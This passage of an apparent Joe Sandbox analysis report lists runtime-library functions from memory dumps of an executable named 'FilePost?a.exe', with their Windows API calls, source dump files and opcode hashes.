                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                          • String ID:
                                          • API String ID: 955152517-0
                                          • Opcode ID: f8ac069aa8106cf1846bea2abed415ea2d2b4614ee9d5d7e7957b5fb2339780d
                                          • Instruction ID: f9934f3a8d7b9a6d6bb12b3caf789fd310bef5e4c8517197282f821bc78c5965
                                          • Opcode Fuzzy Hash: f8ac069aa8106cf1846bea2abed415ea2d2b4614ee9d5d7e7957b5fb2339780d
                                          • Instruction Fuzzy Hash: 7A3192B5A052059FCB14CF98D460AEABFF9AF69304F10805DE696E7368EBB09544CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E397D40 Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ___unDName.LIBVCRUNTIME(00000000,?,00000000,6E397C80,6E397C90,00002800), ref: 6E397D6D
                                            • Part of subcall function 6E39EBF0: ___unDNameEx.LIBVCRUNTIME(?,00002800,6E397C90,6E397C80,00000000,00000000,?,?,6E397D72,00000000,?,00000000,6E397C80,6E397C90,00002800), ref: 6E39EC09
                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(-00000002), ref: 6E397DAC
                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000004,?,00000000), ref: 6E397DC9
                                          • InterlockedPushEntrySList.KERNEL32(?,?), ref: 6E397DEE
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6E397DF8
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6E397E01
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name___unfree$EntryInterlockedListPushmallocstrcpy_s
                                          • String ID:
                                          • API String ID: 2809682464-0
                                          • Opcode ID: 7c1ad8a813ea1ebf7b81ddb1c195c4d30d89e6d2c781911c4774d0d85f4154d3
                                          • Instruction ID: d04b93c50e36aba712fe8c77d74b2f56c3d0dd715e9ac3e09430afc166013e5b
                                          • Opcode Fuzzy Hash: 7c1ad8a813ea1ebf7b81ddb1c195c4d30d89e6d2c781911c4774d0d85f4154d3
                                          • Instruction Fuzzy Hash: 5521C531504606EFDB05CFA9CD549AA7BB8EF86314B2140A9E805D7281F733D945DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D16B4A0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000001,?,6D16B410,6D167726,6D1679B7,?,6D167BEF,?,00000001,?,?,00000001,?,6D1A6BF0,0000000C,6D167CE8), ref: 6D16B4AE
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D16B4BC
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D16B4D5
                                          • SetLastError.KERNEL32(00000000,6D167BEF,?,00000001,?,?,00000001,?,6D1A6BF0,0000000C,6D167CE8,?,00000001,?), ref: 6D16B527
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: af5491e04d0affffd1469c5e6abfa778c2a6ddce8ea0a80f26cd69c44a11fdb4
                                          • Instruction ID: 0111491af8b755afb986554161fb85b81b9c19eeca0f99237c520cfefa7ebd0a
                                          • Opcode Fuzzy Hash: af5491e04d0affffd1469c5e6abfa778c2a6ddce8ea0a80f26cd69c44a11fdb4
                                          • Instruction Fuzzy Hash: 71014C3394D3525EE73416B46C84B672B74EB133B9B21022AF620451E8FFE148129150
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D183ED0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          Strings
                                          • C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe, xrefs: 6D183ED5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                          • API String ID: 0-1657534680
                                          • Opcode ID: f056c1b8e2dcfae3e902bec1460baa0aceb10389781195485f1a626df9bb6e25
                                          • Instruction ID: 0077937300a6a0bd118a5b28dedbf0e8380a1cd9917e7fcf186a47560a6529dc
                                          • Opcode Fuzzy Hash: f056c1b8e2dcfae3e902bec1460baa0aceb10389781195485f1a626df9bb6e25
                                          • Instruction Fuzzy Hash: E721D07160C216BF9B10DF65CC8095BB77CAF013A87068515FA28D7194E7F0DC128BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1791C6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6D179178,?,?,6D179140,?,00000001,?), ref: 6D1791DB
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D1791EE
                                          • FreeLibrary.KERNEL32(00000000,?,?,6D179178,?,?,6D179140,?,00000001,?), ref: 6D179211
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 0173e54748b4dfbf25952e2272bbc8ab1813c5f0dc8591c0d2847f121d54ab2d
                                          • Instruction ID: 58af35e9b0f4252e4066652854fae13e9d3292da32255f86ef4ff20915f0ac90
                                          • Opcode Fuzzy Hash: 0173e54748b4dfbf25952e2272bbc8ab1813c5f0dc8591c0d2847f121d54ab2d
                                          • Instruction Fuzzy Hash: 7DF01C31A40219FBDF11EB90DD09BAE7E7AEF42757F200064A425A2164CBB58E04DA90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00346E20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,00346DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00346E36
                                          • UnloadUserProfile.USERENV(?,?,00000000,?,00346DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00346E51
                                          • CloseHandle.KERNEL32(?,00000000,?,00346DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00346E61
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(-00000001,?,00346DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00346E6F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: free$CloseHandleProfileUnloadUser
                                          • String ID: P<kv
                                          • API String ID: 3143209300-4166494767
                                          • Opcode ID: 8591dc6a4fbd715b76560e5c061e28624325cbda607e7bd405983289724b8f30
                                          • Instruction ID: d6809d4791def2ad30e9a7d31ce27b51d9db402522e986412db343e56b1b2d60
                                          • Opcode Fuzzy Hash: 8591dc6a4fbd715b76560e5c061e28624325cbda607e7bd405983289724b8f30
                                          • Instruction Fuzzy Hash: FAF05475100B01DFD7215F65DD09A4377EDEF02771F048529E4AA9A6A0CB35F890CF52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39823C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6E3981ED,?,?,00000000,?,?,?,6E398318,00000002,FlsGetValue,6E3913F4,FlsGetValue), ref: 6E398249
                                          • GetLastError.KERNEL32(?,6E3981ED,?,?,00000000,?,?,?,6E398318,00000002,FlsGetValue,6E3913F4,FlsGetValue,?,?,6E3980A4), ref: 6E398253
                                          • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,api-ms-,00000007,?,6E3981ED,?,?,00000000,?,?,?,6E398318,00000002,FlsGetValue,6E3913F4,FlsGetValue), ref: 6E398268
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6E39827C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLastwcsncmp
                                          • String ID: api-ms-
                                          • API String ID: 3100911417-2084034818
                                          • Opcode ID: cfd458547abd149fb06c839fbed2c0327c19ad8ba22c63a56b7180367b6491bd
                                          • Instruction ID: f8dd84882411c163adf1d731c912aebc4a8c6b02535f540987371be7da69d07e
                                          • Opcode Fuzzy Hash: cfd458547abd149fb06c839fbed2c0327c19ad8ba22c63a56b7180367b6491bd
                                          • Instruction Fuzzy Hash: 42E04F30254A04BBEF905FA6DE09F0C3F7EBB41B94F244460FE4CE9490E762A590EA44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17C8F6 Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • _free.LIBCMT ref: 6D17CBE1
                                          • _free.LIBCMT ref: 6D17CBFA
                                          • _free.LIBCMT ref: 6D17CC38
                                          • _free.LIBCMT ref: 6D17CC41
                                          • _free.LIBCMT ref: 6D17CC4D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$ErrorLast
                                          • String ID:
                                          • API String ID: 3291180501-0
                                          • Opcode ID: 7b5450c36e688984d96e6d47bf977315cba3424a481ed2b9454fa2ed2a4e75d9
                                          • Instruction ID: ab48e77a9ac8f022499c3a08b5eb504e6ea15ecdcd32f0fe67a0b31097327b91
                                          • Opcode Fuzzy Hash: 7b5450c36e688984d96e6d47bf977315cba3424a481ed2b9454fa2ed2a4e75d9
                                          • Instruction Fuzzy Hash: 7EB17D7590521ADFDB24CF18D884BA9B3B5FF59304F1045EAE949A7368D7B0AE90CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17C46B Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17FD6B: HeapAlloc.KERNEL32(00000000,00013385,00013385,?,6D1843D9,00000220,6D17D246,00013385,?,?,?,?,00000000,00000000,?,6D17D246), ref: 6D17FD9D
                                          • _free.LIBCMT ref: 6D17C57A
                                          • _free.LIBCMT ref: 6D17C591
                                          • _free.LIBCMT ref: 6D17C5AE
                                          • _free.LIBCMT ref: 6D17C5C9
                                          • _free.LIBCMT ref: 6D17C5E0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$AllocHeap
                                          • String ID:
                                          • API String ID: 1835388192-0
                                          • Opcode ID: cd1c4fed7e68819a1dee6acdcae2ee75831e7e56db2c4f2254f7e6fa3d122f3e
                                          • Instruction ID: 44a111a18798658414a73812200a57dfd25b7d8613b84e15f3028971e0e1bb44
                                          • Opcode Fuzzy Hash: cd1c4fed7e68819a1dee6acdcae2ee75831e7e56db2c4f2254f7e6fa3d122f3e
                                          • Instruction Fuzzy Hash: F651C472A04705AFD721CF29DC40A7A77F6FF59724F11465AE909DB268E7B2DA00CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D170792 Relevance: 7.7, APIs: 5, Instructions: 178COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: operator+shared_ptr$NameName::
                                          • String ID:
                                          • API String ID: 2894330373-0
                                          • Opcode ID: 11b9bece6e85a6099ef6ca6dbb5cccafe2db2f21487913dfa1997ed0444fa688
                                          • Instruction ID: 03e1b7d9d56e27ac4800a45db2c423985d882ed8b724a44862b70f8e5c492f41
                                          • Opcode Fuzzy Hash: 11b9bece6e85a6099ef6ca6dbb5cccafe2db2f21487913dfa1997ed0444fa688
                                          • Instruction Fuzzy Hash: 12616D7190421AEEDB11CF6AC844AFE7FB5FB16304F51815AE528AB228D3F79641CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E396445 Relevance: 7.6, APIs: 5, Instructions: 114COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6E39FB28,00000010,?,6E396353,#9n,?), ref: 6E3964B1
                                          • memmove.VCRUNTIME140(?,00000000,?,6E39FB28,00000010,?,6E396353,#9n,?), ref: 6E3964E9
                                          • ___AdjustPointer.LIBCMT(?,?,?,6E396353,#9n,?), ref: 6E396502
                                          • ___AdjustPointer.LIBCMT(?,?,?,6E39FB28,00000010,?,6E396353,#9n,?), ref: 6E396525
                                          • memmove.VCRUNTIME140(?,00000000,?,6E39FB28,00000010,?,6E396353,#9n,?), ref: 6E39652E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: AdjustPointermemmove$abort
                                          • String ID:
                                          • API String ID: 2915871738-0
                                          • Opcode ID: 9a1db1fd4b60b95d08ba9f0ac2456fdd5d9128c38f6e2dd5402073d3876742af
                                          • Instruction ID: 06f42fe6dbb5d24317f1d46cd9c524e86246bb1371eb7e280fa9eb6079778029
                                          • Opcode Fuzzy Hash: 9a1db1fd4b60b95d08ba9f0ac2456fdd5d9128c38f6e2dd5402073d3876742af
                                          • Instruction Fuzzy Hash: B441CCB1A276179FEB498FE5C460BA9B3B4AF04714F10412DDC5687294FB36E890EBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E392E20 Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E392E2E
                                          • _local_unwind2.VCRUNTIME140(?,000000FF), ref: 6E392F25
                                            • Part of subcall function 6E3942E0: _ValidateScopeTableHandlers.LIBCMT ref: 6E3943F4
                                            • Part of subcall function 6E3942E0: __FindPESection.LIBCMT ref: 6E394411
                                          • _CallDestructExceptionObject.LIBVCRUNTIME ref: 6E392EB0
                                          • _global_unwind2.VCRUNTIME140(?), ref: 6E392EBC
                                          • _local_unwind2.VCRUNTIME140(?,?), ref: 6E392EC9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _local_unwind2$CallDestructExceptionFindHandlersObjectScopeSectionTableValidate___except_validate_context_record_global_unwind2
                                          • String ID:
                                          • API String ID: 2319145605-0
                                          • Opcode ID: f3d13c3a5ea1f142452a4eeb759da4179e1c0808f1449dba37e1db50ea43c55b
                                          • Instruction ID: cd6023e9dc16b42b2cce10813d99005d96c22b69482e8c30663db92f341ec9e7
                                          • Opcode Fuzzy Hash: f3d13c3a5ea1f142452a4eeb759da4179e1c0808f1449dba37e1db50ea43c55b
                                          • Instruction Fuzzy Hash: 4F313C729006059BCB00DFA8ECC09ABB7A8FF45354F458565EC1A9B245F731FA15DBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D18571B Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 6D185733
                                            • Part of subcall function 6D17ACB9: HeapFree.KERNEL32(00000000,00000000,?,6D1799DC), ref: 6D17ACCF
                                            • Part of subcall function 6D17ACB9: GetLastError.KERNEL32(?,?,6D1799DC), ref: 6D17ACE1
                                          • _free.LIBCMT ref: 6D185745
                                          • _free.LIBCMT ref: 6D185757
                                          • _free.LIBCMT ref: 6D185769
                                          • _free.LIBCMT ref: 6D18577B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 02e7d79e442cb129d2b2423cad7ade2ad74a48f3e242225c7690da3b74327b47
                                          • Instruction ID: 4b2a7182737867777591d0d82ec3aa6a427a99022d5579e979b7b431bc8eea79
                                          • Opcode Fuzzy Hash: 02e7d79e442cb129d2b2423cad7ade2ad74a48f3e242225c7690da3b74327b47
                                          • Instruction Fuzzy Hash: 15F04F31D1C205EBDA20DB54F1C1D367BE9EA117143A14846F619DB609C7F6F8808AA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D167DD8 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnterCriticalSection.KERNEL32(6D1CB368,00000000,?,6D152074,6D1C9F48,6D18E680,00000001), ref: 6D167DE2
                                          • LeaveCriticalSection.KERNEL32(6D1CB368,?,6D152074,6D1C9F48,6D18E680,00000001), ref: 6D167E15
                                          • RtlWakeAllConditionVariable.NTDLL ref: 6D167E8C
                                          • SetEvent.KERNEL32(?,6D1C9F48,6D18E680,00000001), ref: 6D167E96
                                          • ResetEvent.KERNEL32(?,6D1C9F48,6D18E680,00000001), ref: 6D167EA2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
